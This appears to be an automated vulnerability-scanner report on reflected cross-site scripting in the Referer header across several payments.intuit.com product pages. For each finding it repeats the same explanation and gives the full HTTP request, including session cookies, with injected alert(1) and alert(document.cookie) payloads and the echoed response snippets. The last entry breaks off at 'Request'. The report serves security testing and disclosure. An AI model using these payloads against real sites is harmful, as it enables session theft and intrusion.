GET /products/ HTTP/1.1 Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16; Referer: http://www.google.com/search?hl=en&q=50367--><script>alert(1)</script>6c1e00f3f20
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 70e9a'-alert(1)-'1f622a992cd was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /products/ HTTP/1.1 Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16; Referer: http://www.google.com/search?hl=en&q=70e9a'-alert(1)-'1f622a992cd
...[SNIP]... // This is assigning the ipsRefer to a variable to capture the referring domain when redirects occure var testReferDomain="0"; var eVar17Value = 'http://www.google.com/search?hl=en&q=70e9a'-alert(1)-'1f622a992cd'; </script> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ab319'-alert(1)-'38984c7dc20 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /products/basic-payment-solutions/ HTTP/1.1 Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16; Referer: http://www.google.com/search?hl=en&q=ab319'-alert(1)-'38984c7dc20
...[SNIP]... // This is assigning the ipsRefer to a variable to capture the referring domain when redirects occure var testReferDomain="0"; var eVar17Value = 'http://www.google.com/search?hl=en&q=ab319'-alert(1)-'38984c7dc20'; </script> ...[SNIP]...
The value of the Referer HTTP header is copied into an HTML comment. The payload 3d056--><script>alert(1)</script>4284ad0a88b was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /products/basic-payment-solutions/ HTTP/1.1 Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16; Referer: http://www.google.com/search?hl=en&q=3d056--><script>alert(1)</script>4284ad0a88b
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 50dd9'-alert(1)-'453e9ddad06 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /products/basic-payment-solutions/check-processing.jsp HTTP/1.1 Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16; Referer: http://www.google.com/search?hl=en&q=50dd9'-alert(1)-'453e9ddad06
...[SNIP]... // This is assigning the ipsRefer to a variable to capture the referring domain when redirects occure var testReferDomain="0"; var eVar17Value = 'http://www.google.com/search?hl=en&q=50dd9'-alert(1)-'453e9ddad06'; </script> ...[SNIP]...
The value of the Referer HTTP header is copied into an HTML comment. The payload d6539--><script>alert(1)</script>9940cd93a6a was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /products/basic-payment-solutions/check-processing.jsp HTTP/1.1 Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16; Referer: http://www.google.com/search?hl=en&q=d6539--><script>alert(1)</script>9940cd93a6a
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fffd5'-alert(1)-'a1adc0270af was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /products/basic-payment-solutions/credit-card-processing-equipment.jsp HTTP/1.1 Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16; Referer: http://www.google.com/search?hl=en&q=fffd5'-alert(1)-'a1adc0270af
...[SNIP]... // This is assigning the ipsRefer to a variable to capture the referring domain when redirects occure var testReferDomain="0"; var eVar17Value = 'http://www.google.com/search?hl=en&q=fffd5'-alert(1)-'a1adc0270af'; </script> ...[SNIP]...
The value of the Referer HTTP header is copied into an HTML comment. The payload 61f73--><script>alert(1)</script>21df0f4a775 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /products/basic-payment-solutions/credit-card-processing-equipment.jsp HTTP/1.1 Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16; Referer: http://www.google.com/search?hl=en&q=61f73--><script>alert(1)</script>21df0f4a775
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4f286'-alert(1)-'8e7fe4c65dd was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /products/basic-payment-solutions/index.jsp HTTP/1.1 Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16; Referer: http://www.google.com/search?hl=en&q=4f286'-alert(1)-'8e7fe4c65dd
...[SNIP]... // This is assigning the ipsRefer to a variable to capture the referring domain when redirects occure var testReferDomain="0"; var eVar17Value = 'http://www.google.com/search?hl=en&q=4f286'-alert(1)-'8e7fe4c65dd'; </script> ...[SNIP]...
The value of the Referer HTTP header is copied into an HTML comment. The payload 248a2--><script>alert(1)</script>58daf8a9700 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /products/basic-payment-solutions/index.jsp HTTP/1.1 Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16; Referer: http://www.google.com/search?hl=en&q=248a2--><script>alert(1)</script>58daf8a9700
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2f767'-alert(1)-'9675c472618 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /products/basic-payment-solutions/mobile-credit-card-processing.jsp?scid=ips_gopay_free_card_reader_banner HTTP/1.1 Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16; Referer: http://www.google.com/search?hl=en&q=2f767'-alert(1)-'9675c472618
...[SNIP]... // This is assigning the ipsRefer to a variable to capture the referring domain when redirects occure var testReferDomain="0"; var eVar17Value = 'http://www.google.com/search?hl=en&q=2f767'-alert(1)-'9675c472618'; </script> ...[SNIP]...
The value of the Referer HTTP header is copied into an HTML comment. The payload de4d4--><script>alert(1)</script>82fdb4532f7 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /products/basic-payment-solutions/mobile-credit-card-processing.jsp?scid=ips_gopay_free_card_reader_banner HTTP/1.1 Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16; Referer: http://www.google.com/search?hl=en&q=de4d4--><script>alert(1)</script>82fdb4532f7
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e9f96'-alert(1)-'b074d756760 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
